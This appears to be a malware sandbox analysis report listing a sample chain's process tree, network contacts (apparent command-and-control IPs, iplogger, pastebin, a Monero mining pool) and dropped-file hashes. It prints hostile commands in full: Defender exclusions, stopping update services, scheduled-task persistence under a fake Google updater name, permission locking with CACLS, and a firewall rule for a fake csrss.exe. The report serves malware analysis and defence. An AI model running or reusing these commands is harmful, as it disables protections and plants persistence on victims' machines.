C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Yi0Qu7Ko.exe

C:\Users\Admin\AppData\Local\Temp\A4DC.exe

C:\Users\Admin\AppData\Local\Temp\A4DC.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dT9yG7Sf.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dT9yG7Sf.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Rs37xE9.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Rs37xE9.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9d81246f8,0x7ff9d8124708,0x7ff9d8124718

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 4372 -ip 4372

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 784

C:\Users\Admin\AppData\Local\Temp\C4E8.exe

C:\Users\Admin\AppData\Local\Temp\C4E8.exe

C:\Users\Admin\AppData\Local\Temp\C7D7.exe

C:\Users\Admin\AppData\Local\Temp\C7D7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff9d81246f8,0x7ff9d8124708,0x7ff9d8124718

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2604 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\CDE3.exe

C:\Users\Admin\AppData\Local\Temp\CDE3.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:3

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2252 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\kos4.exe

"C:\Users\Admin\AppData\Local\Temp\kos4.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1900 -ip 1900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 784

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\FEE7.exe

C:\Users\Admin\AppData\Local\Temp\FEE7.exe

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2MK152qh.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2MK152qh.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4268 -ip 4268

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 540

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Z1026-1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1

C:\Program Files (x86)\Drive Tools\zDriveTools.exe

"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -i

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Query

C:\Program Files (x86)\Drive Tools\zDriveTools.exe

"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -s

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:1

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp

"C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp" /SL5="$9005E,6502186,54272,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4908 -ip 4908

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 572

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\98E6.exe

C:\Users\Admin\AppData\Local\Temp\98E6.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 198.209.218.23.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.68.249:80 77.91.68.249 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 249.68.91.77.in-addr.arpa udp
RU 193.233.255.73:80 193.233.255.73 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 73.255.233.193.in-addr.arpa udp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
NL 81.161.229.93:80 81.161.229.93 tcp
FI 77.91.124.71:4341 tcp
US 8.8.8.8:53 93.229.161.81.in-addr.arpa udp
US 8.8.8.8:53 71.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 accounts.google.com udp
NL 157.240.247.35:443 www.facebook.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 35.247.240.157.in-addr.arpa udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
NL 142.250.179.141:443 accounts.google.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 stim.graspalace.com udp
US 188.114.97.0:80 stim.graspalace.com tcp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 21.151.70.163.in-addr.arpa udp
BG 171.22.28.213:80 171.22.28.213 tcp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 213.28.22.171.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 126.178.238.8.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 facebook.com udp
IE 163.70.151.35:443 facebook.com tcp
US 8.8.8.8:53 fbcdn.net udp
IE 163.70.151.35:443 fbcdn.net tcp
US 8.8.8.8:53 35.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 fbsbx.com udp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.28:80 host-host-file8.com tcp
US 8.8.8.8:53 28.26.214.95.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
NL 194.169.175.235:42691 tcp
US 8.8.8.8:53 235.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 89.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
FR 163.172.154.142:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
DE 51.68.190.80:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 142.154.172.163.in-addr.arpa udp
US 8.8.8.8:53 143.68.20.104.in-addr.arpa udp
US 8.8.8.8:53 4ae7d634-9a1d-4039-90ed-76defb0dd612.uuid.datadumpcloud.org udp
US 8.8.8.8:53 80.190.68.51.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp

Files

memory/5000-0-0x0000000000400000-0x0000000000409000-memory.dmp

memory/5000-1-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3284-2-0x0000000000CE0000-0x0000000000CF6000-memory.dmp

memory/5000-3-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9EEB.exe

MD5 3323195a56ab4ecbd18a088c6c5fd2eb
SHA1 2cc0b6798b4f3b5c62dd85421ec9d519444b944a
SHA256 f4838fd962450fe30a3189031d10a08a0f703fc7fd0dd212374bed41de10b37c
SHA512 4cc29d19dd5725781dd4f48ad508ee7efc79e1a42836221c93bb99c2ee2cc38d2f3494e983a545f84a1e3f1ec0c5f74744e6f6b65d72be610da175a96f6585be

C:\Users\Admin\AppData\Local\Temp\9EEB.exe

MD5 3323195a56ab4ecbd18a088c6c5fd2eb
SHA1 2cc0b6798b4f3b5c62dd85421ec9d519444b944a
SHA256 f4838fd962450fe30a3189031d10a08a0f703fc7fd0dd212374bed41de10b37c
SHA512 4cc29d19dd5725781dd4f48ad508ee7efc79e1a42836221c93bb99c2ee2cc38d2f3494e983a545f84a1e3f1ec0c5f74744e6f6b65d72be610da175a96f6585be

C:\Users\Admin\AppData\Local\Temp\A053.exe

MD5 e561df80d8920ae9b152ddddefd13c7c
SHA1 0d020453f62d2188f7a0e55442af5d75e16e7caf
SHA256 5484ca53027230772ae149e3d7684b7e322432ceb013b6bc2440bd3c269192ea
SHA512 a7afed5a6434f296f0e0186de8ce87245bbd0f264498e327188a93551dd45e0e67409e62f3477b526ab5b0927e4349ad66107cbea7f7554b4be53c18227741a5

C:\Users\Admin\AppData\Local\Temp\A053.exe

MD5 e561df80d8920ae9b152ddddefd13c7c
SHA1 0d020453f62d2188f7a0e55442af5d75e16e7caf
SHA256 5484ca53027230772ae149e3d7684b7e322432ceb013b6bc2440bd3c269192ea
SHA512 a7afed5a6434f296f0e0186de8ce87245bbd0f264498e327188a93551dd45e0e67409e62f3477b526ab5b0927e4349ad66107cbea7f7554b4be53c18227741a5

C:\Users\Admin\AppData\Local\Temp\A1EB.exe

MD5 73089952a99d24a37d9219c4e30decde
SHA1 8dfa37723afc72f1728ec83f676ffeac9102f8bd
SHA256 9aa54a5b73fe93d789ec1707ebd41ff824fcf6ba34b18d97ebc566cee8cbce60
SHA512 7088b995c0f6425ad4460b1f286d36e5b7ca3d79308febfac7f212e630b00569239e0b22455198739d20b1fbae1b70c24c22f41a34bab19a793aaa31164aa2d2

C:\Users\Admin\AppData\Local\Temp\A1EB.exe

MD5 73089952a99d24a37d9219c4e30decde
SHA1 8dfa37723afc72f1728ec83f676ffeac9102f8bd
SHA256 9aa54a5b73fe93d789ec1707ebd41ff824fcf6ba34b18d97ebc566cee8cbce60
SHA512 7088b995c0f6425ad4460b1f286d36e5b7ca3d79308febfac7f212e630b00569239e0b22455198739d20b1fbae1b70c24c22f41a34bab19a793aaa31164aa2d2

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vF0Yw6Gv.exe

MD5 c9fecce5ddbbb4c08036eb804806585a
SHA1 de118ddb2f2b644a73e314d1bfc9ff777b84c41c
SHA256 453554affb4477ef1397310265a6a90ae0953e5bca58d9b7b98e7323e7cccdf6
SHA512 59be1a656c71b2dd3a2891a6b27e842f808074dffdd1b954d0ee781bab2183b048263e9381489223d97e74aff6cd8bfa825cab657c4b9aa9eba9d7f8d234faff

C:\Users\Admin\AppData\Local\Temp\A11F.bat

MD5 403991c4d18ac84521ba17f264fa79f2
SHA1 850cc068de0963854b0fe8f485d951072474fd45
SHA256 ef6e942aefe925fefac19fa816986ea25de6935c4f377c717e29b94e65f9019f
SHA512 a20aaa77065d30195e5893f2ff989979383c8d7f82d9e528d4833b1c1236aef4f85284f5250d0f190a174790b650280ffe1fbff7e00c98024ccf5ca746e5b576

C:\Users\Admin\AppData\Local\Temp\A298.exe

MD5 d2ed05fd71460e6d4c505ce87495b859
SHA1 a970dfe775c4e3f157b5b2e26b1f77da7ae6d884
SHA256 3a119008fd025a394f6fb93a0c941e1dc0fa1f9c7606a674388f21d99dfe116f
SHA512 a15efc7c5ddd82ea612444b5df530d11da43bbaaf7f7ae4801c8063c8cffe4538cd47e27639e380b9d1c7e342575169e06af4b298a8faf635865dc4f9dc11b8e

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vF0Yw6Gv.exe

MD5 c9fecce5ddbbb4c08036eb804806585a
SHA1 de118ddb2f2b644a73e314d1bfc9ff777b84c41c
SHA256 453554affb4477ef1397310265a6a90ae0953e5bca58d9b7b98e7323e7cccdf6
SHA512 59be1a656c71b2dd3a2891a6b27e842f808074dffdd1b954d0ee781bab2183b048263e9381489223d97e74aff6cd8bfa825cab657c4b9aa9eba9d7f8d234faff

C:\Users\Admin\AppData\Local\Temp\A298.exe

MD5 d2ed05fd71460e6d4c505ce87495b859
SHA1 a970dfe775c4e3f157b5b2e26b1f77da7ae6d884
SHA256 3a119008fd025a394f6fb93a0c941e1dc0fa1f9c7606a674388f21d99dfe116f
SHA512 a15efc7c5ddd82ea612444b5df530d11da43bbaaf7f7ae4801c8063c8cffe4538cd47e27639e380b9d1c7e342575169e06af4b298a8faf635865dc4f9dc11b8e

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JD7oZ9jo.exe

MD5 f0c7089254a00e815feae5d8181b7f05
SHA1 f3b024cb82395c32629ac49898728fd5010c26cf
